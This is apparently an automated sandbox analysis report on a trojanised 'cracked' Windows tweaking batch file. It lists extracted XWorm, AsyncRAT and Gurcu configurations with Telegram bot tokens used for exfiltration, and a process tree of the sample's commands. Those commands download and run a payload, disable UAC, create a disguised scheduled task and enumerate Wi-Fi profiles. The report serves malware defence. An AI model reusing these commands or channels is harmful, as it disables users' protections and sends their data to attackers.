Resubmissions

13-08-2024 20:57

240813-zrvpzszgrn 10

Analysis

  • max time kernel
    153s
  • max time network
    154s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-08-2024 20:57

General

  • Target

    EXM_Premium_Tweaking_Utility_1.0_Cracked.bat

  • Size

    672KB

  • MD5

    f9ca73d63fe61c4c401528fb470ce08e

  • SHA1

    584f69b507ddf33985673ee612e6099aff760fb1

  • SHA256

    16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

  • SHA512

    6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de

  • SSDEEP

    3072:BIGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:BIGiVNEn14IZVvisL43

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    MicrosoftEdgeUpdate.exe

  • pastebin_url

    https://pastebin.com/raw/ZnhxAV6a

  • telegram

    https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendDocument?chat_id=599133173

https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=109642586

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies security service 2 TTPs 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • UAC bypass 3 TTPs 9 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
  • Disables taskbar notifications via registry modification
  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 2 IoCs

    Possible Turn off User Account Control's privilege elevation for standard users.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    remove IFEO.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 9 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Windows\system32\reg.exe
      Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
      2⤵
        PID:4324
      • C:\Windows\system32\reg.exe
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
        2⤵
          PID:3288
        • C:\Windows\system32\reg.exe
          Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
          2⤵
            PID:1752
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1004
          • C:\Windows\system32\reg.exe
            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
            2⤵
            • UAC bypass
            PID:2532
          • C:\Windows\system32\reg.exe
            Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
            2⤵
              PID:2588
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2960
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path Win32_UserAccount where name="Admin" get sid
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2912
              • C:\Windows\system32\findstr.exe
                findstr "S-"
                3⤵
                  PID:4192
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:2520
                • C:\Windows\system32\chcp.com
                  chcp 437
                  2⤵
                    PID:440
                  • C:\Windows\system32\curl.exe
                    curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
                    2⤵
                      PID:2524
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:792
                    • C:\exm\EXMservice.exe
                      EXMservice.exe
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3116
                      • C:\Users\Admin\AppData\Local\MicrosoftEdgeUpdate.exe
                        "C:\Users\Admin\AppData\Local\MicrosoftEdgeUpdate.exe"
                        3⤵
                        • Drops startup file
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1212
                        • C:\Windows\System32\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdate" /tr "C:\ProgramData\MicrosoftEdgeUpdate.exe"
                          4⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:4628
                      • C:\Users\Admin\AppData\Local\svchost.exe
                        "C:\Users\Admin\AppData\Local\svchost.exe"
                        3⤵
                        • Executes dropped EXE
                        • Drops desktop.ini file(s)
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4764
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:2028
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 65001
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:1536
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh wlan show profile
                            5⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:240
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr All
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:4928
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:5108
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 65001
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:3704
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh wlan show networks mode=bssid
                            5⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:4528
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      2⤵
                        PID:2172
                      • C:\Windows\system32\timeout.exe
                        timeout 2
                        2⤵
                        • Delays execution with timeout.exe
                        PID:4808
                      • C:\Windows\system32\reg.exe
                        Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableVirtualization" /t REG_DWORD /d "0" /f
                        2⤵
                          PID:864
                        • C:\Windows\system32\reg.exe
                          Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f
                          2⤵
                          • Hijack Execution Flow: Executable Installer File Permissions Weakness
                          PID:1332
                        • C:\Windows\system32\reg.exe
                          Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
                          2⤵
                          • UAC bypass
                          PID:1572
                        • C:\Windows\system32\reg.exe
                          Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
                          2⤵
                          • UAC bypass
                          PID:2668
                        • C:\Windows\system32\reg.exe
                          Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f
                          2⤵
                            PID:4516
                          • C:\Windows\system32\reg.exe
                            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
                            2⤵
                            • UAC bypass
                            PID:1488
                          • C:\Windows\system32\reg.exe
                            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ValidateAdminCodeSignatures" /t REG_DWORD /d "0" /f
                            2⤵
                              PID:4464
                            • C:\Windows\system32\reg.exe
                              Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableUIADesktopToggle" /t REG_DWORD /d "0" /f
                              2⤵
                                PID:1864
                              • C:\Windows\system32\reg.exe
                                Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorUser" /t REG_DWORD /d "0" /f
                                2⤵
                                • UAC bypass
                                PID:1084
                              • C:\Windows\system32\reg.exe
                                Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f
                                2⤵
                                  PID:4072
                                • C:\Windows\system32\reg.exe
                                  Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableVirtualization" /t REG_DWORD /d "0" /f
                                  2⤵
                                    PID:960
                                  • C:\Windows\system32\reg.exe
                                    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f
                                    2⤵
                                    • Hijack Execution Flow: Executable Installer File Permissions Weakness
                                    PID:2900
                                  • C:\Windows\system32\reg.exe
                                    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
                                    2⤵
                                    • UAC bypass
                                    PID:324
                                  • C:\Windows\system32\reg.exe
                                    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
                                    2⤵
                                    • UAC bypass
                                    PID:3732
                                  • C:\Windows\system32\reg.exe
                                    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:4116
                                    • C:\Windows\system32\reg.exe
                                      Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
                                      2⤵
                                      • UAC bypass
                                      PID:3396
                                    • C:\Windows\system32\reg.exe
                                      Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ValidateAdminCodeSignatures" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:3504
                                      • C:\Windows\system32\reg.exe
                                        Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableUIADesktopToggle" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:1996
                                        • C:\Windows\system32\reg.exe
                                          Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorUser" /t REG_DWORD /d "0" /f
                                          2⤵
                                          • UAC bypass
                                          PID:4364
                                        • C:\Windows\system32\reg.exe
                                          Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:1052
                                          • C:\Windows\system32\reg.exe
                                            Reg.exe add "HKLM\SOFTWARE\Microsoft\FTH" /v "Enabled" /t REG_DWORD /d "0" /f
                                            2⤵
                                              PID:4856
                                            • C:\Windows\system32\reg.exe
                                              Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore" /f
                                              2⤵
                                                PID:4732
                                              • C:\Windows\system32\reg.exe
                                                Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineUA" /f
                                                2⤵
                                                  PID:4704
                                                • C:\Windows\system32\reg.exe
                                                  Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "StartupBoostEnabled" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:3792
                                                  • C:\Windows\system32\reg.exe
                                                    Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "BackgroundModeEnabled" /t REG_DWORD /d "0" /f
                                                    2⤵
                                                      PID:4384
                                                    • C:\Windows\system32\reg.exe
                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "UseDpiScaling" /t REG_DWORD /d "0" /f
                                                      2⤵
                                                        PID:5036
                                                      • C:\Windows\system32\reg.exe
                                                        Reg.exe add "HKCU\Software\Microsoft\Multimedia\Audio" /v "UserDuckingPreference" /t REG_DWORD /d "3" /f
                                                        2⤵
                                                          PID:2448
                                                        • C:\Windows\system32\reg.exe
                                                          Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\BootAnimation" /v "DisableStartupSound" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:3476
                                                          • C:\Windows\system32\reg.exe
                                                            Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
                                                            2⤵
                                                              PID:2936
                                                            • C:\Windows\system32\reg.exe
                                                              Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
                                                              2⤵
                                                                PID:424
                                                              • C:\Windows\system32\reg.exe
                                                                Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
                                                                2⤵
                                                                  PID:3168
                                                                • C:\Windows\system32\reg.exe
                                                                  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ctfmon" /t REG_SZ /d "C:\Windows\System32\ctfmon.exe" /f
                                                                  2⤵
                                                                  • Adds Run key to start application
                                                                  PID:1952
                                                                • C:\Windows\system32\reg.exe
                                                                  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\VideoSettings" /v "VideoQualityOnBattery" /t REG_DWORD /d "1" /f
                                                                  2⤵
                                                                    PID:5040
                                                                  • C:\Windows\system32\reg.exe
                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "IconsOnly" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:4232
                                                                    • C:\Windows\system32\reg.exe
                                                                      Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:4252
                                                                      • C:\Windows\system32\reg.exe
                                                                        Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                        2⤵
                                                                          PID:232
                                                                        • C:\Windows\system32\reg.exe
                                                                          Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                          2⤵
                                                                            PID:2784
                                                                          • C:\Windows\system32\reg.exe
                                                                            Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowDeviceNameInTelemetry" /t REG_DWORD /d "0" /f
                                                                            2⤵
                                                                              PID:4360
                                                                            • C:\Windows\system32\reg.exe
                                                                              Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\safer\codeidentifiers" /v "authenticodeenabled" /t REG_DWORD /d "0" /f
                                                                              2⤵
                                                                                PID:3184
                                                                              • C:\Windows\system32\reg.exe
                                                                                Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
                                                                                2⤵
                                                                                  PID:4928
                                                                                • C:\Windows\system32\reg.exe
                                                                                  Reg.exe add "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                  2⤵
                                                                                    PID:1184
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Speech_OneCore\Settings\OnlineSpeechPrivacy" /v "HasAccepted" /t REG_DWORD /d "0" /f
                                                                                    2⤵
                                                                                      PID:4984
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
                                                                                      2⤵
                                                                                        PID:4052
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
                                                                                        2⤵
                                                                                          PID:2240
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
                                                                                          2⤵
                                                                                            PID:3800
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
                                                                                            2⤵
                                                                                              PID:564
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                              2⤵
                                                                                                PID:5096
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                Reg.exe add "HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadMode" /t REG_DWORD /d "0" /f
                                                                                                2⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:240
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
                                                                                                2⤵
                                                                                                  PID:2184
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
                                                                                                  2⤵
                                                                                                    PID:2244
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
                                                                                                    2⤵
                                                                                                      PID:1536
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
                                                                                                      2⤵
                                                                                                        PID:752
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
                                                                                                        2⤵
                                                                                                          PID:900
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                          2⤵
                                                                                                            PID:3832
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\appDiagnostics" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                            2⤵
                                                                                                              PID:4036
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\userAccountInformation" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                              2⤵
                                                                                                                PID:968
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
                                                                                                                2⤵
                                                                                                                  PID:1968
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SystemPaneSuggestionsEnabled" /t REG_DWORD /d "0" /f
                                                                                                                  2⤵
                                                                                                                    PID:3132
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
                                                                                                                    2⤵
                                                                                                                      PID:1476
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "RotatingLockScreenEnabled" /t REG_DWORD /d "0" /f
                                                                                                                      2⤵
                                                                                                                        PID:3292
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "PublishUserActivities" /t REG_DWORD /d "0" /f
                                                                                                                        2⤵
                                                                                                                          PID:1020
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "UploadUserActivities" /t REG_DWORD /d "0" /f
                                                                                                                          2⤵
                                                                                                                            PID:4780
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
                                                                                                                            2⤵
                                                                                                                              PID:3468
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
                                                                                                                              2⤵
                                                                                                                                PID:4816
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v "DownloadMode" /t REG_DWORD /d "0" /f
                                                                                                                                2⤵
                                                                                                                                  PID:3516
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                  2⤵
                                                                                                                                    PID:4388
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_NOTIFICATION_SOUND" /t REG_DWORD /d "0" /f
                                                                                                                                    2⤵
                                                                                                                                      PID:2912
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
                                                                                                                                      2⤵
                                                                                                                                        PID:4548
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\QuietHours" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                        2⤵
                                                                                                                                          PID:1044
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewymicrosoft.windows.immersivecontrolpanel" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                          2⤵
                                                                                                                                            PID:4028
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                            2⤵
                                                                                                                                              PID:1284
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.LowDisk" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                              2⤵
                                                                                                                                                PID:868
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.Print.Notification" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:1812
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1920
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.WiFiNetworkManager" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4936
                                                                                                                                                    • C:\Windows\system32\reg.exe
